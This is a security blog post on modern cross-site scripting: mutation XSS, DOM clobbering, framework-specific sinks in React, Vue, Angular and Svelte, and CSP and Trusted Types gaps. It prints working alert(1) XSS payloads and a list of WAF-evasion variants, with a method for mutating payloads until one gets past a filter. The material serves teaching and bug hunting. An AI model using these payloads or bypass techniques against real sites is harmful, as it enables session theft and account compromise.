← back to index
METHODOLOGY 12 DEC 2025 · 12 min read

XSS Reborn

Modern mutation vectors, framework-specific sinks, and WAF evasion in 2026.

Cross-site scripting was supposed to be a solved problem by now. Frameworks escape by default. Browsers ship Trusted Types. Content Security Policies are everywhere. And yet, every week, somebody pops a top-100 web app with a payload that fits in a tweet.

Why XSS didn't die

Three reasons, roughly equally weighted:

  1. Frameworks escape by default — but every framework has an escape hatch. dangerouslySetInnerHTML, v-html, [innerHTML], {@html}. Each one is a JIRA ticket waiting to be filed.
  2. The DOM is enormous. Browsers parse, sanitize, mutate, and re-serialize content through dozens of code paths. Mutation XSS exploits the disagreement between sanitization-time HTML and post-insertion HTML.
  3. Defense relies on configuration. CSPs are written by humans. So are sanitizer allowlists. So are URL validation regexes. There is always a hole.

Mutation XSS, briefly

The classic mXSS pattern: a sanitizer accepts a payload because it parses as harmless HTML, then the payload is inserted into a context where the browser re-parses it differently and produces a script-execution context.

<listing><img src=x onerror=alert(1)></listing>

Some sanitizers see the <listing> wrapper as a content-only element and let the inner string through unchanged as a text node. When the browser reflows the resulting DOM into innerHTML and back, the inner content is treated as live HTML, the onerror handler is set, and the image fails to load on cue. Sanitizer bypass via parser disagreement — exactly the same family of bug as our TeamCity friend, just in a browser instead of a router.

SVG namespaces, noscript in different parser modes, template elements, and the <noembed> tag all have similar histories. If you write a sanitizer, you are signing up to chase the HTML spec for the rest of your career.

DOM clobbering revisited

Pure HTML — no script tag — can override JavaScript globals via id and name attributes. If application code does:

if (window.config) { ... }
else { /* secure default */ }

An attacker who can inject <a id=config href="javascript:alert(1)"> turns the conditional into one that picks the wrong branch. Real-world impact has included CSP bypasses, sanitizer bypasses, and authentication-flow tampering.

The 2024-2026 wave of clobbering research extended this into prototype pollution territory. Worth reading current papers if you take this seriously.

Framework-specific sinks

React

<div dangerouslySetInnerHTML={{__html: userInput}} />
<a href={userInput}>...</a>     // javascript: URLs still work
React.createElement(userInput, ...)  // tag name injection

Vue

<div v-html="userInput"></div>
{{ userInput }}              // safe in 3.x — but compile-time
                             // template injection on the server
                             // is its own catastrophe.

Angular

Angular's template language is a programming language. If user input ever reaches the template compiler — even reflected through a CMS field — you get full sandboxed JS execution, and the sandbox has historically been escapable.

Svelte

{@html ...} does no escaping. Svelte's reactivity model means the sink can fire on a state change far removed from the original input.

WAF evasion that still works

WAFs match against signatures. Signatures are regexes. Regexes lose to creativity:

# Case mixing
<ScRiPt>alert(1)</ScRiPt>

# HTML entity encoding inside attributes
<a href="java&#115;cript:alert(1)">

# Whitespace alternatives
<img src=x onerror=alert(1)>
<img/src=x/onerror=alert(1)>
<img	src=x	onerror=alert(1)>

# No parens, no alphanumerics — old but charming
<svg onload=alert\`1\`>

# Event handlers nobody filters
<details ontoggle=alert(1) open>
<video src=x onerror=alert(1)>
<style onload=alert(1)>...

The reliable WAF bypass methodology: take the canonical payload, mutate one axis at a time (case → encoding → whitespace → element → event), and see what slips through. The first request that hits the application unmodified is your starting point. Refine from there.

Trusted Types, CSP, and where they leak

Trusted Types, when properly enforced (require-trusted-types-for 'script'), genuinely make most DOM XSS dead on arrival. CSPs with strict script-src values and no unsafe-inline close most reflected XSS.

Where they fail in practice:

  • Allowlisted CDNs hosting AngularJS, jQuery, etc. If cdnjs.cloudflare.com is in your script-src, an attacker with HTML injection can include a vulnerable older library and use it as a jump pad.
  • JSONP endpoints on allowlisted domains. One callback parameter, one bypass.
  • Strict-dynamic with a forgotten nonce in source HTML. If an attacker can read or guess a nonce, the entire policy unravels.
  • Trusted Types policies that pass-through. A policy named default that returns its input unchanged is the same as no policy at all.

The actual takeaway

XSS in 2026 is rarely a missing escape on user input. It's a sanitizer disagreement, a framework escape hatch, a misconfigured policy, or a clobbered global. The hunters who keep finding it have stopped looking for raw <script> tags and started reading the parser specs.

Be one of those hunters. Or, if you're building, treat every escape hatch as a security decision and document accordingly. The bug class is not done with us.